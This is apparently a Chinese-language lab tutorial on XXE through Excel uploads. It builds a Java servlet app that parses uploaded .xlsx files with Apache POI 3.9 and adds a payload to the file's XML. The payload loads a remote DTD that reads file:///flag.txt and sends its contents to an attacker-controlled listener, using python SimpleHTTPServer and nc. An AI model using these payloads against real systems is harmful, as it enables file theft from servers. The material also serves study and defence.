Excel中的XXE攻击
一、准备阶段
所需环境 idea
原理:xslx文件是由xml文件组成的,可以改成.zip的文件后缀名进行解压,所以如果如果没有禁用外部实体,会存在XXE漏洞。poi这个依赖可以解析excel首先是解析xml,所以导致。
打开idea,创建一个maven环境
利用servlet进行
项目结构:
红线划掉的为多余的,将1.jsp修改为index.jsp
二、依赖
将下面这段话复制到pom.xml里
<!-- https://mvnrepository.com/artifact/org.apache.poi/poi -->
<!-- https://mvnrepository.com/artifact/org.apache.poi/poi-ooxml -->
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>3.9</version>
</dependency>
三、解析代码
1、解析Excel(无回显表中数据)
fileName:ExcelData
package com.shydow.servlet;
import org.apache.poi.ss.usermodel.Cell;
import org.apache.poi.ss.usermodel.Row;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
public class ExcelData {
public static void main(String[] args) throws IOException, InterruptedException {
File excelFile = new File("C:\\Users\\HP\\Desktop\\ssr\\xlsx\\dnslog.xlsx");
FileInputStream in = new FileInputStream(excelFile);
XSSFWorkbook workbook = new XSSFWorkbook(in);
XSSFSheet sheet = workbook.getSheetAt(0);
int total = sheet.getLastRowNum();
for(Row row : sheet){
for (Cell cell : row){
System.out.println(cell.getStringCellValue()+" ");
}
System.out.println("");
}
}
}
3、另一种(有回显表中数据)
package com.xxetest.demo1;
import org.apache.poi.xssf.usermodel.XSSFRow;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import java.io.FileInputStream;
public class ExcelDataController {
private XSSFSheet sheet;
/**
* 构造函数,初始化excel数据
*
* @param filePath excel路径
* @param sheetName sheet表名
*/
ExcelDataController(String filePath, String sheetName) throws Exception {
FileInputStream fileInputStream = null;
fileInputStream = new FileInputStream(filePath);
XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
//获取sheet
sheet = sheets.getSheet(sheetName);
}
//打印excel数据
public void readExcelData() {
//获取行数
int rows = sheet.getPhysicalNumberOfRows();
for (int i = 0; i < rows; i++) {
//获取列数
XSSFRow row = sheet.getRow(i);
int columns = row.getPhysicalNumberOfCells();
for (int j = 0; j < columns; j++) {
String cell = row.getCell(j).toString();
System.out.println(cell);
}
}
}
public static void main(String[] args) throws Exception {
ExcelDataController sheet1 = new ExcelDataController("C:\\Users\\HP\\Desktop\\ssr\\xlsx\\dnslog.xlsx", "Sheet1");
sheet1.readExcelData();
}
}
3、文件上传(学习的狂学老师的java,https://www.kuangstudy.com/)
fileName:FileServlet
package com.xxetest.servlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.List;
import java.util.UUID;
import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.FileUploadException;
import org.apache.commons.fileupload.ProgressListener;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;
public class FileServlet extends HttpServlet {
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws javax.servlet.ServletException, IOException {
//判断上传的表单是普通表单还是带文件的表单,是返回true,否返回false;
if (!ServletFileUpload.isMultipartContent(request)){
return;//如果这是一个普通文件我们直接返回
}//如果通过了这个if,说明我们的表单是带文件上传的
//创建上传文件的保存目录,为了安全建议在WEB-INF目录下,用户无法访问
String uploadpath = this.getServletContext().getRealPath("WEB-INF/Upload");//获取上传文件的保存路径
File uploadfile = new File(uploadpath);
if (!uploadfile.exists()){
uploadfile.mkdir();//如果目录不存在就创建这样一个目录
}
//临时文件
//临时路径,如果上传的文件超过预期的大小,我们将它存放到一个临时目录中,过几天自动删除,或者提醒用户转存为永久
String tmppath = this.getServletContext().getRealPath("WEB-INF/tmp");
File file = new File(tmppath);
if (!file.exists()){
file.mkdir();//如果目录不存在就创建这样临时目录
}
//处理上传的文件一般需要通过流来获取,我们可以通过request.getInputstream(),原生态文件上传流获取,十分麻烦
//但是我们都建议使用Apache的文件上传组件来实现,common-fileupload,它需要依赖于common-io组件;
try {
//1、创建DiskFileItemFactory对象,处理文件上传路径或限制文件大小
DiskFileItemFactory factory = gteDiskFileItemFactory(file);
//2、获取ServletFileUpload
ServletFileUpload upload = getServletFileUpload(factory);
//3、处理上传文件
String uuidFileName = UUID.randomUUID().toString();
String msg = uploadParseRequest(upload,request,uploadpath,uuidFileName);
//Servlet请求转发消息
request.setAttribute("msg",msg);
request.getRequestDispatcher("/info.jsp").forward(request,response);
ExcelData excel = new ExcelData();
excel.test(uuidFileName);
}catch (FileUploadException | InterruptedException e){
e.printStackTrace();
}
}
public static DiskFileItemFactory gteDiskFileItemFactory(File file){
//1、创建DiskFileItemFactory对象,处理文件上传路径或限制文件大小
DiskFileItemFactory factory = new DiskFileItemFactory();
//通过这个工厂设置一个缓冲区,当上传的文件大小大于缓冲区的时候,将它放到临时文件中;
factory.setSizeThreshold(1024 * 1024);//缓冲区大小为1M
factory.setRepository(file);
return factory;
}
public static ServletFileUpload getServletFileUpload(DiskFileItemFactory factory){
//2、获取ServletFileUpload
ServletFileUpload upload = new ServletFileUpload(factory);
//监听文件上传进度
upload.setProgressListener(new ProgressListener() {
public void update(long pBytesRead, long lpContentLenght, int i) {
//pBytesRead:已读取到的文件大小
//pContentLenght:文件大小
System.out.println("总大小:"+lpContentLenght+"已上传:"+pBytesRead);
}
});
//处理乱码问题
upload.setHeaderEncoding("UTF-8");
//设置单个文件的最大值
upload.setFileSizeMax(1024 * 1024 * 10);
//设置总共能够上传文件的大小
//1024 = 1kb * 1024 = 1M * 10 = 10M
upload.setSizeMax(1024 * 1024 * 10);
return upload;
}
public static String uploadParseRequest(ServletFileUpload upload,HttpServletRequest request,String uploadpath,String uuidFileName) throws IOException, FileUploadException {
String msg = "";
//3、处理上传文件
//把前端的请求解析,封装成一个FileItem对象
List<FileItem> fileItems = upload.parseRequest(request);
for (FileItem fileItem : fileItems) {
if (fileItem.isFormField()){ //判断是普通表单还是带文件的表单
//getFieldName指的是前端表单控件的name
String name = fileItem.getFieldName();
String value = fileItem.getString("UTF-8");//处理乱码
System.out.println(name+":"+value);
}else {//判断它是带文件的表单
//======================处理文件=======================//
//拿到文件的名字
String uploadFileName = fileItem.getName();
System.out.println("上传的文件名:"+uploadFileName);
if (uploadFileName.trim().equals("") || uploadFileName == null){
continue;
}
//获得上传的文件名,例如/img/girl/ooa.jpg,只需要ooa,其前面的后面的都不需要
String fileName = uploadFileName.substring(uploadFileName.lastIndexOf("/") + 1);
//获得文件的后缀名
String fileExtName = uploadFileName.substring(uploadFileName.lastIndexOf(".") + 1);
/*
如果文件后缀名fileExtName不是我们所需要的
就直接return,不处理,告诉用户文件类型不对
*/
//可以使用UUID(唯一识别的通用码),保证文件名唯一
//UUID.randomUUID,随机生一个唯一识别的通用码
//网络传输中的东西,都需要序列化
//pojo,实体类,如果想要在多个电脑运行,传输--->需要吧对象都序列化了
//JNI=java Native Interface
//implements Serializable :标记接口,JVM--->java栈 本地方法栈 native-->c++
String uuidPath= UUID.randomUUID().toString();
System.out.println("文件信息【文件名:"+fileName+"文件类型:"+fileExtName+"】");
//可以使用UUID(唯一通用识别码)来保证文件名的统一
//=======================传输文件=========================//
//获得文件上传的流
InputStream inputStream = fileItem.getInputStream();
//创建一个文件输出流
FileOutputStream fos = new FileOutputStream(uploadpath + "/" + uuidFileName +"."+ fileExtName);
String fileName2 = uuidFileName+fileExtName;
//创建一个缓冲区
byte[] buffer = new byte[1024 * 1024];
//判断是否读取完毕
int len = 0;
//如果大于0,说明还存在数据
while ((len=inputStream.read(buffer))>0){
fos.write(buffer,0,len);
}
//关闭流
fos.close();
inputStream.close();
msg = "文件上传成功!";
fileItem.delete();//上传成功,清除临时文件
}
}
return msg;
}
}
4、前端
fileName:index.jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
<title>Title</title>
</head>
<body>
<form action="${pageContext.request.contextPath}/upload"
enctype="multipart/form-data"
method="post"
>
<input type="text" name="username"><br/>
<p><input type="file" name="file"></p>
<p></p><input type="submit">|<input type="reset"></p>
</form>
</body>
</html>
fileName:info.jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
<title>Title</title>
</head>
<body>
${msg}
</body>
</html>
四、攻击准备阶段
1、将你的xlsx文件的后缀名改为zip,进行解压会得到
打开这个文件将payload加入第一行下面
payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://自启的文件服务器ip:端口/owen.dtd">
%remote;]>
<root/>
上传文件,提交显示文件上传成功后,dns就会被解析
结果
五、实战阶段
思路:
1、既然能解析dns,那访问我的ip是否可以,利用xml引入外部实体,去加载我的文件
2、我的文件可不可以去读取他的本地文件
1、按照上面说的我需要构建一个服务器
1、在你的vps(云服务器)的/root下建立一个名为owen.dtd的文件
内容如下
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'http://监听ip:端口/?file=%file;'>">
%eval;
%error;
就是让他去读取根下目录的flag.txt 然后向我的监听端口发送一个请求,后面file的值就是读出来的文件内容
流程如图
2、开启服务
利用python语句去开启一个服务,访问该服务可以看到/root下的文件
python -m SimpleHTTPServer 8099
3、开启监听端口
nc -lvv 8090
运行代码
提交文件
接收到请求
而且监听端口也收到了请求
